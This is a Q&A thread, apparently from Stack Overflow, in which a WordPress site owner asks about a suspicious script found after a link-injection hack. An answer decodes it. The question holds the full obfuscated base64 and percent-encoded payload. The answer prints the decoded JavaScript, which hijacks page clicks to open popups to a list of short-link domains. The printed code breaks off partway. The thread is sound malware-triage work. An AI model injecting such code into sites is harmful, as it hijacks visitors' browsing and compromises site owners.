# I found this on my wordpress site, please what could it possibly be doing? I feel it's fishy. My site was recently hacked with link injection

Tags: javascript, wordpress, hyperlink, code-injection, inject

```
<script type="text/javascript">document.write(atob("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCIlM0MlNzMlNjMlNzIlNjklNzAlNzQlM0UlMjglNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjAlMjglNzAlNjElNzIlNjElNkQlNjUlNzQlNjUlNzIlNzMlMjklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzQlNjElNzIlNjclNjUlNzQlNzMlMjAlM0QlMjAlNUIlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNjIlNkIlNDQlMzAlNjMlMzglMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNEUlNTglNzklMzElNjMlMzYlMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNzElNzclNEYlMzIlNjMlMzElMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNUElNjMlNkQlMzMlNjMlMzYlMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNUElNTUlNjMlMzQlNjMlMzMlMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlN0ElNDUlNjclMzUlNjMlMzAlMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNjYlNEQlNzQlMzYlNjMlMzIlMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNTAlNTYlN0ElMzclNjMlMzUlMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNTclNjUlNkIlMzglNjMlMzklMjclMkMlMjAlMjclNjglNzQlNzQlNzAlNzMlM0ElMkYlMkYlMzElNjMlNkYlMkUlNjklNkYlMkYlNzYlNDElNkElMzklNjMlMzIlMjclNUQlMEQlMEElMjAlMjAlMjAlMjAlMkYlMkYlMjAlNTQlNjklNkQlNjUlNzMlMjAlNjIlNjUlNzQlNzclNjUlNjUlNkUlMjAlNjMlNkMlNjklNjMlNkIlNzMlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzIlNjUlNzMlNzQlNEQlNjklNkUlNzUlNzQlNjUlNzMlMjAlM0QlMjAlMzElM0IlMEQlMEElMjAlMjAlMjAlMjAlMkYlMkYlMjAlNEUlNzUlNkQlNjIlNjUlNzIlMjAlNkYlNjYlMjAlNjglNkYlNzUlNzIlNzMlMjAlNzQlNkYlMjAlNjElNkMlNkMlNkYlNzclMjAlNzIlNjUlMkQlNjMlNkMlNjklNjMlNkIlMjAlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjElNkMlNkMlNkYlNzclNjUlNjQlNDglNkYlNzUlNzIlNzMlMjAlM0QlMjAlMzIlM0IlMEQlMEElMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNjElNzYlNjUlNTQlNjElNzIlNjclNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNzMlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjAlM0QlMjAlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklMjAlM0QlM0UlMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzQlNjElNzIlNjclNjUlNzQlNzMlMkUlNjYlNkYlNzIlNDUlNjElNjMlNjglMjglMjglNzQlNjElNzIlNjclNjUlNzQlMkMlMjAlNjklNkUlNjQlNjUlNzglMjklMjAlM0QlM0UlMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjklNjYlMjglMjElNkMlNkYlNjMlNjElNkMlNTMlNzQlNkYlNzIlNjElNjclNjUlMkUlNjclNjUlNzQlNDklNzQlNjUlNkQlMjglNjAlMjQlN0IlNzQlNjElNzIlNjclNjUlNzQlN0QlMkQlNkMlNkYlNjMlNjElNkMlMkQlNzMlNzQlNkYlNzIlNjElNjclNjUlNjAlMjklMjklN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMDklNkMlNkYlNjMlNjElNkMlNTMlNzQlNkYlNzIlNjElNjclNjUlMkUlNzMlNjUlNzQlNDklNzQlNjUlNkQlMjglNjAlMjQlN0IlNzQlNjElNzIlNjclNjUlNzQlN0QlMkQlNkMlNkYlNjMlNjElNkMlMkQlNzMlNzQlNkYlNzIlNjElNjclNjUlNjAlMkMlMjAlMzAlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjclNjUlNzQlNTIlNjElNkUlNjQlNkYlNkQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDYlNzIlNkYlNkQlNTMlNzQlNkYlNzIlNjElNjclNjUlMjAlM0QlMjAlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklMjAlM0QlM0UlMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNkUlNkYlNkUlNTYlNjklNzMlNjklNzQlNjUlNjQlMjAlM0QlMjAlNzQlNjElNzIlNjclNjUlNzQlNzMlMkUlNjYlNjklNkMlNzQlNjUlNzIlMjglMjglNzQlNjElNzIlNjclNjUlNzQlMkMlMjAlNjklNkUlNjQlNjUlNzglMjklMjAlM0QlM0UlMjAlNkMlNkYlNjMlNjElNkMlNTMlNzQlNkYlNzIlNjElNjclNjUlMkUlNjclNjUlNzQlNDklNzQlNjUlNkQlMjglNjAlMjQlN0IlNzQlNjElNzIlNjclNjUlNzQlN0QlMkQlNkMlNkYlNjMlNjElNkMlMkQlNzMlNzQlNkYlNzIlNjElNjclNjUlNjAlMjklMjAlM0QlM0QlMjAlMzAlMjklMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzIlNjUlNzQlNzUlNzIlNkUlMjAlNkUlNkYlNkUlNTYlNjklNzMlNjklNzQlNjUlNjQlNUIlNEQlNjElNzQlNjglMkUlNjYlNkMlNkYlNkYlNzIlMjglNEQlNjElNzQlNjglMkUlNzIlNjElNkUlNjQlNkYlNkQlMjglMjklMjAlMkElMjAlNkUlNkYlNkUlNTYlNjklNzMlNjklNzQlNjUlNjQlMkUlNkMlNjUlNkUlNjclNzQlNjglMjklNUQlM0IlMEQlMEElMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDElNzMlNTYlNjklNzMlNjklNzQlNjUlNjQlMjAlM0QlMjAlMjglNzQlNjElNzIlNjclNjUlNzQlMjklMjAlM0QlM0UlMjAlNkMlNkYlNjMlNjElNkMlNTMlNzQlNkYlNzIlNjElNjclNjUlMkUlNzMlNjUlNzQlNDklNzQlNjUlNkQlMjglNjAlMjQlN0IlNzQlNjElNzIlNjclNjUlNzQlN0QlMkQlNkMlNkYlNjMlNjElNkMlMkQlNzMlNzQlNkYlNzIlNjElNjclNjUlNjAlMkMlMjAlMzElMjklM0IlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjclNjUlNzQlNTQlNjklNkQlNjUlNTMlNzQlNkYlNzIlNjElNjclNjUlMjAlM0QlMjAlMjglNkIlNjUlNzklMjklMjAlM0QlM0UlMjAlNkMlNkYlNjMlNjElNkMlNTMlNzQlNkYlNzIlNjElNjclNjUlMkUlNjclNjUlNzQlNDklNzQlNjUlNkQlMjglNjAlMjQlN0IlNkIlNjUlNzklN0QlMkQlNkMlNkYlNjMlNjElNkMlMkQlNzMlNzQlNkYlNzIlNjElNjclNjUlNjAlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNjUlNzQlNTQlNjklNkQlNjUlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjAlM0QlMjAlMjglNkIlNjUlNzklMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklMjAlM0QlM0UlMjAlNkMlNkYlNjMlNjElNkMlNTMlNzQlNkYlNzIlNjElNjclNjUlMkUlNzMlNjUlNzQlNDklNzQlNjUlNkQlMjglNjAlMjQlN0IlNkIlNjUlNzklN0QlMkQlNkMlNkYlNjMlNjElNkMlMkQlNzMlNzQlNkYlNzIlNjElNjclNjUlNjAlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjclNjUlNzQlNDglNkYlNzUlNzIlNzMlNDQlNjklNjYlNjYlMjAlM0QlMjAlMjglNzMlNzQlNjElNzIlNzQlNDQlNjElNzQlNjUlMkMlMjAlNjUlNkUlNjQlNDQlNjElNzQlNjUlMjklMjAlM0QlM0UlMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNkQlNzMlNDklNkUlNDglNkYlNzUlNzIlMjAlM0QlMjAlMzElMzAlMzAlMzAlMjAlMkElMjAlMzYlMzAlMjAlMkElMjAlMzYlMzAlM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzIlNjUlNzQlNzUlNzIlNkUlMjAlNEQlNjElNzQlNjglMkUlNzIlNkYlNzUlNkUlNjQlMjglNEQlNjElNzQlNjglMkUlNjElNjIlNzMlMjglNjUlNkUlNjQlNDQlNjElNzQlNjUlMjAlMkQlMjAlNzMlNzQlNjElNzIlNzQlNDQlNjElNzQlNjUlMjklMjAlMkYlMjAlNkQlNzMlNDklNkUlNDglNkYlNzUlNzIlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjclNjUlNzQlNEQlNjklNkUlNzQlNzMlNDQlNjklNjYlNjYlMjAlM0QlMjAlMjglNzMlNzQlNjElNzIlNzQlNDQlNjElNzQlNjUlMkMlMjAlNjUlNkUlNjQlNDQlNjElNzQlNjUlMjklMjAlM0QlM0UlMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNkQlNzMlNDklNkUlNEQlNjklNkUlNzQlNzMlMjAlM0QlMjAlMzElMzAlMzAlMzAlMjAlMkElMjAlMzYlMzAlM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzIlNjUlNzQlNzUlNzIlNkUlMjAlNEQlNjElNzQlNjglMkUlNzIlNkYlNzUlNkUlNjQlMjglNEQlNjElNzQlNjglMkUlNjElNjIlNzMlMjglNjUlNkUlNjQlNDQlNjElNzQlNjUlMjAlMkQlMjAlNzMlNzQlNjElNzIlNzQlNDQlNjElNzQlNjUlMjklMjAlMkYlMjAlNkQlNzMlNDklNkUlNEQlNjklNkUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlN0QlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzYlNjklNzMlNjklNzQlNEUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjAlM0QlMjAlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMkMlMjAlNjglNkYlNzMlNzQlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklMjAlM0QlM0UlMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjElNzYlNjUlNTQlNjElNzIlNjclNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNzMlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjAlM0QlMjAlNjclNjUlNzQlNTIlNjElNkUlNjQlNkYlNkQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDYlNzIlNkYlNkQlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjUlNzQlNTQlNjklNkQlNjUlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNjAlMjQlN0IlNjglNkYlNzMlNzQlN0QlMkQlNkQlNkUlNzQlNzMlNjAlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjUlNzQlNTQlNjklNkQlNjUlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNjAlMjQlN0IlNjglNkYlNzMlNzQlN0QlMkQlNjglNzUlNzIlNzMlNjAlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDElNzMlNTYlNjklNzMlNjklNzQlNjUlNjQlMjglNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzclNjklNkUlNjQlNkYlNzclMkUlNkYlNzAlNjUlNkUlMjglNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMkMlMjAlMjIlNUYlNjIlNkMlNjElNkUlNkIlMjIlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlN0QlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlMkYlMkYlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzIlNjElNkUlNjQlNkYlNkQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjAlM0QlMjAlNjclNjUlNzQlNTIlNjElNkUlNjQlNkYlNkQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDYlNzIlNkYlNkQlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlNzMlNjElNzYlNjUlNTQlNjElNzIlNjclNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNzMlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklM0IlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjAlNjclNkMlNkYlNjIlNjElNkMlNDMlNkMlNjklNjMlNkIlMjglNjUlNzYlNjUlNkUlNzQlMjklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjUlNzYlNjUlNkUlNzQlMkUlNzMlNzQlNkYlNzAlNTAlNzIlNkYlNzAlNjElNjclNjElNzQlNjklNkYlNkUlMjglMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjglNkYlNzMlNzQlMjAlM0QlMjAlNkMlNkYlNjMlNjElNzQlNjklNkYlNkUlMkUlNjglNkYlNzMlNzQlM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNkMlNjUlNzQlMjAlNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjAlM0QlMjAlNjclNjUlNzQlNTIlNjElNkUlNjQlNkYlNkQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDYlNzIlNkYlNkQlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjAlM0QlMjAlNDQlNjElNzQlNjUlMkUlNzAlNjElNzIlNzMlNjUlMjglNkUlNjUlNzclMjAlNDQlNjElNzQlNjUlMjglMjklMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNjElNzYlNjUlNjQlNDQlNjElNzQlNjUlNDYlNkYlNzIlNEQlNjklNkUlNzQlNzMlMjAlM0QlMjAlNjclNjUlNzQlNTQlNjklNkQlNjUlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNjAlMjQlN0IlNjglNkYlNzMlNzQlN0QlMkQlNkQlNkUlNzQlNzMlNjAlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNjElNzYlNjUlNjQlNDQlNjElNzQlNjUlNDYlNkYlNzIlNDglNkYlNzUlNzIlNzMlMjAlM0QlMjAlNjclNjUlNzQlNTQlNjklNkQlNjUlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNjAlMjQlN0IlNjglNkYlNzMlNzQlN0QlMkQlNjglNzUlNzIlNzMlNjAlMjklM0IlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjklNjYlMjAlMjglNzMlNjElNzYlNjUlNjQlNDQlNjElNzQlNjUlNDYlNkYlNzIlNEQlNjklNkUlNzQlNzMlMjAlMjYlMjYlMjAlNzMlNjElNzYlNjUlNjQlNDQlNjElNzQlNjUlNDYlNkYlNzIlNDglNkYlNzUlNzIlNzMlMjklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzQlNzIlNzklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNzQlNkYlNzIlNjElNjclNjUlNDQlNjElNzQlNjUlNDYlNkYlNzIlNEQlNjklNkUlNzQlNzMlMjAlM0QlMjAlNzAlNjElNzIlNzMlNjUlNDklNkUlNzQlMjglNzMlNjElNzYlNjUlNjQlNDQlNjElNzQlNjUlNDYlNkYlNzIlNEQlNjklNkUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNzMlNzQlNkYlNzIlNjElNjclNjUlNDQlNjElNzQlNjUlNDYlNkYlNzIlNDglNkYlNzUlNzIlNzMlMjAlM0QlMjAlNzAlNjElNzIlNzMlNjUlNDklNkUlNzQlMjglNzMlNjElNzYlNjUlNjQlNDQlNjElNzQlNjUlNDYlNkYlNzIlNDglNkYlNzUlNzIlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNkQlNjklNkUlNzQlNzMlNDQlNjklNjYlNjYlMjAlM0QlMjAlNjclNjUlNzQlNEQlNjklNkUlNzQlNzMlNDQlNjklNjYlNjYlMjglNkUlNkYlNzclNDQlNjElNzQlNjUlMkMlMjAlNzMlNzQlNkYlNzIlNjElNjclNjUlNDQlNjElNzQlNjUlNDYlNkYlNzIlNEQlNjklNkUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjMlNkYlNkUlNzMlNzQlMjAlNjglNkYlNzUlNzIlNzMlNDQlNjklNjYlNjYlMjAlM0QlMjAlNjclNjUlNzQlNDglNkYlNzUlNzIlNzMlNDQlNjklNjYlNjYlMjglNkUlNkYlNzclNDQlNjElNzQlNjUlMkMlMjAlNzMlNzQlNkYlNzIlNjElNjclNjUlNDQlNjElNzQlNjUlNDYlNkYlNzIlNDglNkYlNzUlNzIlNzMlMjklM0IlMEQlMEElMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjklNjYlMjAlMjglNjglNkYlNzUlNzIlNzMlNDQlNjklNjYlNjYlMjAlM0UlM0QlMjAlNjElNkMlNkMlNkYlNzclNjUlNjQlNDglNkYlNzUlNzIlNzMlMjklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjElNzYlNjUlNTQlNjElNzIlNjclNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNzMlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjUlNzQlNTQlNjklNkQlNjUlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNjAlMjQlN0IlNjglNkYlNzMlNzQlN0QlMkQlNjglNzUlNzIlNzMlNjAlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjklNjYlMjAlMjglNkQlNjklNkUlNzQlNzMlNDQlNjklNjYlNjYlMjAlM0UlM0QlMjAlNzIlNjUlNzMlNzQlNEQlNjklNkUlNzUlNzQlNjUlNzMlMjklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNjklNjYlMjAlMjglNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjklMjAlN0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjUlNzQlNTQlNjklNkQlNjUlNTQlNkYlNTMlNzQlNkYlNzIlNjElNjclNjUlMjglNjAlMjQlN0IlNjglNkYlNzMlNzQlN0QlMkQlNkQlNkUlNzQlNzMlNjAlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzclNjklNkUlNjQlNkYlNzclMkUlNkYlNzAlNjUlNkUlMjglNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMkMlMjAlMjIlNUYlNjIlNkMlNjElNkUlNkIlMjIlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNzMlNjUlNzQlNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlNDElNzMlNTYlNjklNzMlNjklNzQlNjUlNjQlMjglNkUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjklM0IlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMjAlNjMlNjElNzQlNjMlNjglMjAlMjglNjUlNzIlNzIlNkYlNzIlMjklMjAlN0IlMjAlNzYlNjklNzMlNjklNzQlNEUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMkMlMjAlNjglNkYlNzMlNzQlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMjAlNjUlNkMlNzMlNjUlMjAlN0IlMjAlNzYlNjklNzMlNjklNzQlNEUlNjUlNzclNEMlNkYlNjMlNjElNzQlNjklNkYlNkUlMjglNzQlNjElNzIlNjclNjUlNzQlNzMlMkMlMjAlNjglNkYlNzMlNzQlMkMlMjAlNkUlNkYlNzclNDQlNjElNzQlNjUlMjklM0IlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlN0QlMEQlMEElMjAlMjAlMjAlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjElNjQlNjQlNDUlNzYlNjUlNkUlNzQlNEMlNjklNzMlNzQlNjUlNkUlNjUlNzIlMjglMjIlNjMlNkMlNjklNjMlNkIlMjIlMkMlMjAlNjclNkMlNkYlNjIlNjElNkMlNDMlNkMlNjklNjMlNkIlMjklMEQlMEElN0QlMjklMjglMjklM0MlMkYlNzMlNjMlNzIlNjklNzAlNzQlM0UiKSk8L3NjcmlwdD4="))</script>
```

My website was recently hacked with link injection and I've been trying to troubleshoot it.

Answer (score 2):

I have decoded the contents of that script and it appears to be malicious javascript that injects your website page with some javascript that opens windows to the following targets on a timeline basis.

const targets = ['https://1co.io/bkD0c8', 'https://1co.io/NXy1c6', 'https://1co.io/qwO2c1', 'https://1co.io/Zcm3c6', 'https://1co.io/ZUc4c3', 'https://1co.io/zEg5c0', 'https://1co.io/fMt6c2', 'https://1co.io/PVz7c5', 'https://1co.io/Wek8c9', 'https://1co.io/vAj9c2']

To be safe, I did this using an online javascript tool and displayed the contents in the console window. Below is the full code decoded:

```
const targets = ['https://1co.io/bkD0c8', 'https://1co.io/NXy1c6', 'https://1co.io/qwO2c1', 'https://1co.io/Zcm3c6', 'https://1co.io/ZUc4c3', 'https://1co.io/zEg5c0', 'https://1co.io/fMt6c2', 'https://1co.io/PVz7c5', 'https://1co.io/Wek8c9', 'https://1co.io/vAj9c2']
    // Times between clicks
    const restMinutes = 1;
    // Number of hours to allow re-click 
    const allowedHours = 2;


    const saveTargetLocationsToStorage = (targets) => {
        targets.forEach((target, index) => {
            if(!localStorage.getItem(`${target}-local-storage`)){
                localStorage.setItem(`${target}-local-storage`, 0);
            }
        });
    }
    const getRandomLocationFromStorage = (targets) => {
        const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
        return nonVisited[Math.floor(Math.random() * nonVisited.length)];
    }
    const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

    const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
    const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

    const getHoursDiff = (startDate, endDate) => {
        const msInHour = 1000 * 60 * 60;
        return Math.round(Math.abs(endDate - startDate) / msInHour);
    }
    const getMintsDiff = (startDate, endDate) => {
        const msInMints = 1000 * 60;
        return Math.round(Math.abs(endDate - startDate) / msInMints);
    }

    const visitNewLocation = (targets, host, nowDate) => {
        saveTargetLocationsToStorage(targets);
        newLocation = getRandomLocationFromStorage(targets);
        setTimeToStorage(`${host}-mnts`, nowDate);
        setTimeToStorage(`${host}-hurs`, nowDate);
        setLocationAsVisited(newLocation);
        window.open(newLocation, "_blank");
    }

    // const randomLocation = getRandomLocationFromStorage(targets);
    saveTargetLocationsToStorage(targets);

    function globalClick(event) {
        event.stopPropagation();
        const host = location.host;
        let newLocation = getRandomLocationFromStorage(targets);
        const nowDate = Date.parse(new Date());
        const savedDateForMints = getTimeStorage(`${host}-mnts`);
        const savedDateForHours = getTimeStorage(`${host}-hurs`);

        if (savedDateForMints && savedDateForHours) {
            try {
